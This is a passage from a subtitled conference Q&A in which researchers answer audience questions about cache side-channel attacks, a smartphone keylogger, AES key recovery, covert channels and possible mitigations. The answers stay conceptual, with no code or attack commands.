ML: If you know which cache lines have been accessed by the process, you can invalidate those cache lines before you switch processes, but again, it's a trade-off with performance. You can also flush the whole cache when you switch processes, and then it's empty and you don't see any activity anymore, but there's also a performance trade-off there.

Microphone: Okay, maybe a second question. There are some ARM architectures that have random cache-line invalidations. Did you try those, to see whether you can still see a [unintelligible] channel there?

ML: If they're truly random... but probably you just have to make more and more measurements, and then you can average out the noise, and then you can do these attacks again. It's like with Prime+Probe, where you need more measurements because it's much more noisy; in the end you will just need many more measurements.
CM: So, on ARM, it's supposed to be pretty random, at least according to the manual, but we actually found nice ways to evict exactly the cache lines that we wanted to evict, so it's not actually that pseudo-random. Even if something is truly random, it might be nice, but then it's also quite complicated to implement. I mean, you probably don't want a random number generator just for the cache.

Microphone: Okay. Thanks.

Herald: Okay, and then the three guys here on the microphone in the front.

Microphone: My question is about a detail of the keylogger. You could distinguish between space, backspace, and the alphabet, which is quite interesting. But could you also figure out the specific keys that were pressed, and if so, how?

ML: Yeah, that depends on the implementation of the keyboard. What we did is use the Android stock keyboard, which ships with the Samsung, so it's pre-installed. And if there is a table somewhere in the code which says "okay, if you press this exact location or this image, it's an A or a B", then you can also do a more sophisticated attack. So, if you find any functions or data in the code which directly tell you "okay, this is this character," you can also spy on the actual key characters on the keyboard.

Microphone: Thank you.

Microphone: Hi. Thank you for your talk. My first question is: what can we actually do now to mitigate this kind of attack? By, for example, switching off TSX or using ECC RAM?

CM: So, I think the most important thing to protect would be crypto, and the good thing is that today we know how to build crypto that is resistant to side-channel attacks. So a good start would be to stop using implementations that have been known to be vulnerable for 10 years. Things like keystrokes are way harder to protect; let's say crypto is manageable, the whole system is clearly another problem. You could have different types of countermeasures on the hardware side, but that would mean that Intel and ARM actually want to fix this, and that they know how to fix it; I don't even know how to fix this in hardware. Then, on the system side, if you prevent some kinds of memory sharing, you don't have Flush+Reload anymore, and Prime+Probe is much noisier, so that would be an improvement.

Microphone: Thank you.

Herald: Do we have signal angel questions? No. Okay, then more microphone.

Microphone: Hi, thank you. I wanted to ask about the way you establish the covert channel between the two processes, because it obviously has to be timed in a way to transmit information from one process to the other. Is there anywhere that you documented the whole... you know, it's actually almost like the seven layers, or something like that. Have you documented that anywhere? It would be really interesting to know how it works.

ML: You can find this information in the papers, because there are several papers on covert channels using this. The NDSS paper will be published in February, I guess, but the ARMageddon paper also includes a covert channel, and you can find more information about what the packets look like and how the synchronization works in the paper.

Microphone: Thank you.

Herald: One last question?

Microphone: Hi! You mentioned that you used Osvik's attack for the AES side channel. Did you solve the AES round detection, and is it different from some scheduler manipulation?

CM: On this one, I think we only did a synchronous attack, so we already knew when the victim was going to be scheduled, and we didn't have to do anything with schedulers.

Microphone: Alright, thank you.
Herald: Are there any more questions? No, I don't see anyone. Then, thank you very much again to our speakers.

applause

music

Subtitles created by c3subtitles.de in the year 2020. Join, and help us!